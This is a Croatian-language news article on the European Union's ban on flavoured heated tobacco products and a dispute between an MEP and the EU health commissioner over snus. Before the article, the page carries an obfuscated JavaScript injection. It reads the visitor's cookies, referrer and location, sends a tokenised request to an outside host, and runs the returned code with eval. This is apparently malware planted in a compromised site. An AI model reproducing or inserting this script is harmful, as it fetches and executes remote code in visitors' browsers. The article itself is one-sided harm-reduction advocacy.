;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Europska unija zabranjuje aromatizirane grijane duhanske proizvode

Europska komisija (EK) predložila je zabranu prodaje aromatiziranih grijanih duhanskih proizvoda zbog prijavljenog povećanja upotrebe, a direktiva je stupila na snagu 23. studenog 2022.

Zabrana je predložena kao odgovor na izvješće o 10-postotnom porastu količine prodaje grijanih duhanskih proizvoda u nekoliko zemalja EU-a. Pokriva sve okuse osim duhana i ukida prava država članica da izuzmu grijane duhanske proizvode od obveze da nose zdravstvena upozorenja.

Dok je direktiva službeno stupila na snagu 23. studenog, zemlje članice EU-a imaju rok do 23. srpnja 2023. da je ugrade u svoja nacionalna zakonodavstva, a sama zabrana će se primjenjivati ​​od 23. listopada 2023.

S obzirom na studije koje pokazuju učinkovitost proizvoda kao pomoć pri prestanku pušenja, zagovornici smanjenja štete od pušenja (THR) diljem EU-a ne slažu se sa zabranom. “Uklanjanjem aromatiziranog grijanog duhana s tržišta poduzimamo još jedan korak prema ostvarenju naše vizije u okviru Europskog plana za pobjedu protiv raka za stvaranje ‘generacije bez duhana’ s manje od 5% stanovništva koje puši do 2040.”, rekla je povjerenica EU za zdravstvo Stella Kyriakides, koja je poznata po svom anti-THR stavu.

Još jedna nerazumna EU zabrana

Ranije 2022., švedska zastupnica u Europskom parlamentu Sara Skyttedal službeno je podnijela zastupnička pitanja u vezi sa snusom europskoj povjerenici (EK) za zdravlje i sigurnost hrane Stelli Kyriakides. Pitanja su se pojavila uoči objave Plana EU-a za borbu protiv raka u veljači 2022., za koji su mnogi stručnjaci tvrdili da izostavlja vrlo ključne strategije za smanjenje štete, kao što je uključivanje sigurnijih alternativa duhanu.

“Činjenica da Komisija ipak ustraje pri stajalištu da snus uzrokuje rak je i iznenađujuća i, da budemo iskreni, prilično izvanredna”, rekao je tada Skyttedal kako ga citira Snusforumet. Snus je vlažni duhanski proizvod u prahu koji se dulje vrijeme stavlja ispod gornje usne. Najpopularniji je u Švedskoj, Danskoj i Norveškoj, gdje se smatra učinkovitim proizvodom za smanjenje štete.

Zapravo, kao što je zastupnicau Europskom parlamentu ispravno naglasila, snus nije samo doveo do toga da se Švedska može pohvaliti najnižom stopom pušenja u Europi, već i do smanjenja smrtnih slučajeva povezanih s duhanom u Švedskoj za polovicu prosjeka EU-a, unatoč tome što je ukupna uporaba duhana ostala na razini EU-a. prosjek. „Ako se Direktiva o duhanskim proizvodima treba revidirati kako bi se uzela u obzir borba protiv raka, dijeli li Komisija mišljenje da EU treba promijeniti svoju regulativu o snusu?“ upitala je Skyttedal Kyriakides.

Još jedan pogrešan stav

Kao odgovor na argumente zastupnika u Europskom parlamentu, nažalost, Kyriakides rekla je da stajalište EK ostaje nepromijenjeno jer se snus i drugi oralni duhanski proizvodi povezuju s rakom i drugim štetnim učincima na zdravlje. “Neosporno je da duhan za oralnu uporabu stvara ovisnost i ima negativne zdravstvene učinke, uključujući rak.” Kyriakides je dalje citirala izvješće Znanstvenog odbora EU-a za nove i novootkrivene zdravstvene rizike iz 2008. za koje kaže da je “potvrdilo negativne zdravstvene učinke snusa”.

Ovaj odgovor izazvao je oštru reakciju Skyttedal, koja je istaknula da zapravo većina studija povezanih sa snusom pronalazi malo ili nimalo poveznica s rakom, te je nastavila citirati Lancetov Globalni teret bolesti kao i studiju iz 2020. objavljenu u Scandinavian Journalu javnog zdravstva, oboje zaključuju da nema dokaza koji upućuju na vezu između snusa i raka.

Choose your Reaction!
  • Neke države članice već su usvojile ovaj prijedlog, uključujući susjednu Italiju čije je ministarstvo još jednom istaknulo važnost usporavanja beskrajnog protoka novih duhanskih proizvoda koji svakodnevno pristižu na tržište. Prijedlog će morati usvojiti vlade 27 država članica prije no što stupi na snagu, a važno je istaknuti i da zabrana neće obuhvatiti sve proizvode za vaping, već isključivo one koji koriste grijani duhan!

Leave a Comment